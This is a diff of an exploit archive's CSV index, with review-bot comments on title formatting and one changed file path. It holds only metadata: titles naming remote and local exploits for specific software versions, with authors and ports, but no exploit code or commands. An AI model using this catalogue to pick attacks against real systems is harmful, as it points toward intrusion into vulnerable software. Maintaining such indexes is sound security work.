 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,windows,local,0
-30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - Buffer Overflow (SEH) (.reg)",2013-12-09,"Mike Czumak",windows,local,0
+30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",windows,local,0
 30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0
 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
 29801,platforms/php/local/29801.php,"PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0
@@ -8696,7 +8696,7 @@ id,file,description,date,author,platform,type,port
 36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0
 36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0
 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
-36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0
+36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0
 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)",2015-04-23,ThreatActor,windows,local,0
 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)",2015-04-24,naxxo,windows,local,0
 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
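Review bot: The new description for id 36822 removes the stray opening quote but leaves `search textbox` unquoted, whereas neighbouring rows mark the affected input with single quotes (`'.wav' File` in the 36826 row of this same hunk, `'Input Directory'` further down in the file). For consistency I would write `"Quick Search 1.1.0.189 - 'search textbox' Buffer Overflow (SEH Unicode) (Egghunter)"`. The `(Unicode SEH)` to `(SEH Unicode)` normalisation itself matches the other hunks in this commit.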
@@ -8772,7 +8772,7 @@ id,file,description,date,author,platform,type,port
 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",windows,local,0
 40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
-38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
+38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite Buffer Overflow (SEH)",2015-09-15,Un_N0n,windows,local,0
 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
 38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
@@ -8824,8 +8824,8 @@ id,file,description,date,author,platform,type,port
 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0
 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0
 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
-38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0
-38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0
+38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0
+38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0
 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
 38752,platforms/windows/local/38752.c,"Watchguard Server Center - Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0
 38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
@@ -9228,12 +9228,15 @@ id,file,description,date,author,platform,type,port
 42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0
 42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0
 42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
+42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
+42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
+42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
-10,platforms/linux/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
+10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139
 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
 19,platforms/linux/remote/19.c,"PoPToP PPTP 
1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
@@ -9387,7 +9390,7 @@ id,file,description,date,author,platform,type,port
 349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535
 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
-364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
+364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
 372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
 373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell",2004-08-04,infamous41md,linux,remote,21
 378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21
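Review bot: The rewritten row for id 10 in the `-9228,12 +9228,15` hunk changes the `file` column from `platforms/linux/remote/10.c` to `platforms/multiple/remote/10.c` (and `platform` to `multiple`), but this diff only touches files.csv, so nothing visible here shows the file itself being moved. If the rename is not part of the same changeset, the index now points at a path that does not exist and anything resolving entries by the `file` column will fail for this id. Worth confirming the corresponding `git mv` is in this commit, or that the platform reclassification is not applied to the path until it is. The three added rows (42624–42626) follow the existing column layout and look fine.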
@@ -10515,7 +10518,7 @@ id,file,description,date,author,platform,type,port
 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660
 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0
-9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
+9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660
 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0
 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0
 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0
@@ -10560,7 +10563,7 @@ id,file,description,date,author,platform,type,port
 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0
 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0
 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690
-9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
+9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0
 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0
 9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123
@@ -10645,7 +10648,7 @@ id,file,description,date,author,platform,type,port
 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0
 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0
 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555
-10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - (SEH) Exploit",2009-12-29,Lincoln,windows,remote,6660
+10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Exploit (SEH)",2009-12-29,Lincoln,windows,remote,6660
 10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0
 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0
@@ -10756,7 +10759,7 @@ id,file,description,date,author,platform,type,port
 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0
 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80
 13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0
-13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
+13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Exploit (SEH)",2010-06-17,b0nd,windows,remote,0
 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0
 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
@@ -10973,7 +10976,7 @@ id,file,description,date,author,platform,type,port
 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0
 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
 16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0
-16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
+16320,platforms/unix/remote/16320.rb,"Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
 16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,linux,remote,0
 16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0
 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0
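Review bot: The rewritten 16320 description still carries an unbalanced quote, `'Username' map script'` (three single quotes), which the commit leaves in place while adding the version range; the Samba option is the single phrase `username map script`, so the intended form is `"Samba 3.0.20 < 3.0.25rc3 - 'Username map script' Command Execution (Metasploit)"`. The same slip is introduced on the 10293 line in the later hunk at -22417, where the new text reads `' News Module` with an opening quote and no closing one. Single quotes are not CSV delimiters, so the file still parses, but both rows render as typos in the searchable index.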
@@ -11445,7 +11448,7 @@ id,file,description,date,author,platform,type,port
 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
 16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
-16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
+16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
 16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
@@ -12221,7 +12224,7 @@ id,file,description,date,author,platform,type,port
 20334,platforms/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0
 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0
 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0
-20340,platforms/unix/remote/20340.c,"Samba 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0
+20340,platforms/unix/remote/20340.c,"Samba 2.0.7 - SWAT Logging Failure",2000-11-01,dodeca-T,unix,remote,0
 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit)",2012-08-08,Metasploit,php,remote,0
 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0
 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
@@ -12524,7 +12527,7 @@ id,file,description,date,author,platform,type,port
 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 - Short Password Login",2001-07-21,hypoclear,unix,remote,0
 21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0
 21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0
-21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - pagecount File Overwrite",2001-07-22,kyprizel,multiple,remote,0
+21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - 'pagecount' File Overwrite",2001-07-22,kyprizel,multiple,remote,0
 21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0
 21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
 21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0
@@ -12926,7 +12929,7 @@ id,file,description,date,author,platform,type,port
 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0
 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0
 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0
-22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0
+22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - 'results.stm' Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0
 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0
 22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0
 22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0
@@ -12973,7 +12976,7 @@ id,file,description,date,author,platform,type,port
 22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0
 22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption",2003-03-06,eSDee,linux,remote,0
 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0
-22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0
+22356,platforms/unix/remote/22356.c,"Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0
 22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote,0
 22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0
 22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0
@@ -12999,7 +13002,7 @@ id,file,description,date,author,platform,type,port
 22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0
 22455,platforms/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0
 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0
-22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
+22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Stack Overflow ROP-Based Exploit (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
 22468,platforms/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,unix,remote,0
 22469,platforms/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,unix,remote,0
 22470,platforms/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,unix,remote,0
@@ -13425,7 +13428,7 @@ id,file,description,date,author,platform,type,port
 24065,platforms/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,hardware,remote,0
 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0
 24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0
-24076,platforms/windows/remote/24076.txt,"Sambar 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0
+24076,platforms/windows/remote/24076.txt,"Sambar Server 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0
 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer - Directory Traversal",2004-05-03,"Imperva Application Defense Center",windows,remote,0
 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0
 24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0
@@ -13455,9 +13458,9 @@ id,file,description,date,author,platform,type,port
 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote,0
 24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote,0
 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0
-24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
-24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
-24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
+24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp' show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
+24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp' title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
+24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
 24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0
 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0
@@ -13777,7 +13780,7 @@ id,file,description,date,author,platform,type,port
 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0
 25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote,0
 25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String",2005-05-23,"Luigi Auriemma",multiple,remote,0
-25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - results.stm indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
+25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
 25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
 25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 - Server Referer Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0
 25697,platforms/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Privilege Escalation",2005-05-24,"Oliver Karow",windows,remote,0
@@ -14714,15 +14717,15 @@ id,file,description,date,author,platform,type,port
 33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
 33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0
 40344,platforms/php/remote/40344.rb,"SugarCRM 6.5.23 - REST PHP Object Injection Exploit (Metasploit)",2016-09-07,"Egidio Romano",php,remote,80
-33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
+33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0
 33490,platforms/multiple/remote/33490.txt,"Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
